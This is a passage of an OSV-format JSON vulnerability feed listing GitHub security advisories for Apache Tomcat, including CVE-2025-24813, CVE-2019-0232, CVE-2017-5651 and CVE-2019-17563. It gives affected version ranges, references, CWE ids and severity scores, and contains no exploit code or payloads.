"10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-83qj-6fr2-vhqg/GHSA-83qj-6fr2-vhqg.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.99" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-83qj-6fr2-vhqg/GHSA-83qj-6fr2-vhqg.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-83qj-6fr2-vhqg/GHSA-83qj-6fr2-vhqg.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-83qj-6fr2-vhqg/GHSA-83qj-6fr2-vhqg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24813" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/0a668e0c27f2b7ca0cc7c6eea32253b9b5ecb29c" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/eb61aade8f8daccaecabf07d428b877975622f72" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/f6c01d6577cf9a1e06792be47e623d36acc3b5dc" }, { "type": "WEB", "url": "https://github.com/absholi7ly/POC-CVE-2025-24813/blob/main/README.md" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00003.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20250321-0001" }, { "type": "WEB", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-24813" }, { "type": "WEB", "url": "https://www.vicarius.io/vsociety/posts/cve-2025-24813-detect-apache-tomcat-rce" }, { "type": "WEB", "url": "https://www.vicarius.io/vsociety/posts/cve-2025-24813-mitigate-apache-tomcat-rce" }, { "type": "WEB", "url": "https://www.vicarius.io/vsociety/posts/cve-2025-24813-tomcat-detect-vulnerability" }, { "type": "WEB", "url": "https://www.vicarius.io/vsociety/posts/cve-2025-24813-tomcat-mitigation-vulnerability" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/03/10/5" } ], "database_specific": { "cwe_ids": [ "CWE-44", "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2025-03-10T22:25:00Z", "nvd_published_at": "2025-03-10T17:15:35Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8vmx-qmch-mpqg", "published": "2019-04-18T14:27:35Z", "modified": "2024-03-16T05:19:17.739703Z", "aliases": [ "CVE-2019-0232" ], "summary": "Apache Tomcat OS Command Injection vulnerability", "details": "When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/).", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.17" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.2", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-8vmx-qmch-mpqg/GHSA-8vmx-qmch-mpqg.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.5.40" } ] } ], "versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", "8.0.49", "8.0.5", "8.0.50", "8.0.51", "8.0.52", "8.0.53", "8.0.8", "8.0.9", "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-8vmx-qmch-mpqg/GHSA-8vmx-qmch-mpqg.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.94" } ] } ], "versions": [ "7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.8", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86", "7.0.88", "7.0.90", "7.0.91", "7.0.92", "7.0.93" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-8vmx-qmch-mpqg/GHSA-8vmx-qmch-mpqg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-0232" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c%40%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190419-0001" }, { "type": "WEB", "url": "https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227030103/http://www.securityfocus.com/bid/107906" }, { "type": "WEB", "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2019-784" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://www.synology.com/security/advisory/Synology_SA_19_17" }, { "type": "WEB", "url": "https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1712" }, { "type": "WEB", "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat" }, { "type": "WEB", "url": "https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/52ffb9fbf661245386a83a661183d13f1de2e5779fa23837a08e02ac%40%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/52ffb9fbf661245386a83a661183d13f1de2e5779fa23837a08e02ac@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5f297a4b9080b5f65a05bc139596d0e437d6a539b25e31d29d028767%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5f297a4b9080b5f65a05bc139596d0e437d6a539b25e31d29d028767@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/673b6148d92cd7bc99ea2dcf85ad75d57da44fc322d51f37fb529a2a%40%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/673b6148d92cd7bc99ea2dcf85ad75d57da44fc322d51f37fb529a2a@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/96849486813a95dfd542e1618b7923ca945508aaf4a4341f674d83e3%40%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/96849486813a95dfd542e1618b7923ca945508aaf4a4341f674d83e3@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a6c87a09a71162fd563ab1c4e70a08a103e0b7c199fc391f1c9c4c35%40%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a6c87a09a71162fd563ab1c4e70a08a103e0b7c199fc391f1c9c4c35@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/dd4b325cdb261183dbf5ce913c102920a8f09c26dae666a98309165b%40%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/dd4b325cdb261183dbf5ce913c102920a8f09c26dae666a98309165b@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f4d48b32ef2b6aa49c8830241a9475da5b46e451f964b291c7a0a715%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f4d48b32ef2b6aa49c8830241a9475da5b46e451f964b291c7a0a715@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/153506/Apache-Tomcat-CGIServlet-enableCmdLineArguments-Remote-Code-Execution.html" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2019/May/4" } ], "database_specific": { "cwe_ids": [ "CWE-78" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:26:43Z", "nvd_published_at": "2019-04-15T15:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9hg2-395j-83rm", "published": "2022-05-13T01:46:13Z", "modified": "2024-04-18T17:16:24.017955Z", "aliases": [ "CVE-2017-5651" ], "summary": "Expected Behavior Violation in Apache Tomcat", "details": "In Apache Tomcat 9.0.0.M1 to 9.0.0.M18 and 8.5.0 to 8.5.12, the refactoring of the HTTP connectors introduced a regression in the send file processing. If the send file processing completed quickly, it was possible for the Processor to be added to the processor cache twice. This could result in the same Processor being used for multiple requests which in turn could lead to unexpected errors and/or response mix-up.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.0.M19" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.0.M18", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9hg2-395j-83rm/GHSA-9hg2-395j-83rm.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.13" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.2", "8.5.3", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.5.12", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9hg2-395j-83rm/GHSA-9hg2-395j-83rm.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.0.M19" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.0.M18", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9hg2-395j-83rm/GHSA-9hg2-395j-83rm.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.13" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.2", "8.5.3", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.5.12", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9hg2-395j-83rm/GHSA-9hg2-395j-83rm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-5651" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/494429ca210641b6b7affe89a2b0a6c0ff70109b" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/9233d9d6a018be4415d4d7d6cb4fe01176adf1a8" }, { "type": "WEB", "url": "https://web.archive.org/web/20170420113605/http://www.securitytracker.com/id/1038219" }, { "type": "WEB", "url": "https://web.archive.org/web/20170417124228/http://www.securityfocus.com/bid/97544" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20180614-0001" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/201705-09" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6694538826b87522fb723d2dcedd537e14ebe0a381d92e5525a531d8@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6694538826b87522fb723d2dcedd537e14ebe0a381d92e5525a531d8%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://github.com/search?q=repo%3Aapache%2Ftomcat+apache.coyote+path%3A%2F%5Eres%5C%2Fbnd%5C%2F%2F\u0026type=code" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://bz.apache.org/bugzilla/show_bug.cgi?id=60918" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" } ], "database_specific": { "cwe_ids": [ "CWE-440" ], "github_reviewed": true, "github_reviewed_at": "2022-07-01T13:44:41Z", "nvd_published_at": "2017-04-17T16:59:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9xcj-c8cr-8c3c", "published": "2019-12-26T18:22:26Z", "modified": "2024-03-10T05:19:10.199468Z", "aliases": [ "CVE-2019-17563" ], "related": [ "CGA-76c4-v9xm-9m69" ], "summary": "In Apache Tomcat, when using FORM authentication there was a narrow window where an attacker could perform a session fixation attack", "details": "When using FORM authentication with Apache Tomcat 9.0.0.M1 to 9.0.29, 8.5.0 to 8.5.49 and 7.0.0 to 7.0.98 there was a narrow window where an attacker could perform a session fixation attack. The window was considered too narrow for an exploit to be practical but, erring on the side of caution, this issue has been treated as a security vulnerability.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "7.0.99" } ] } ], "versions": [ 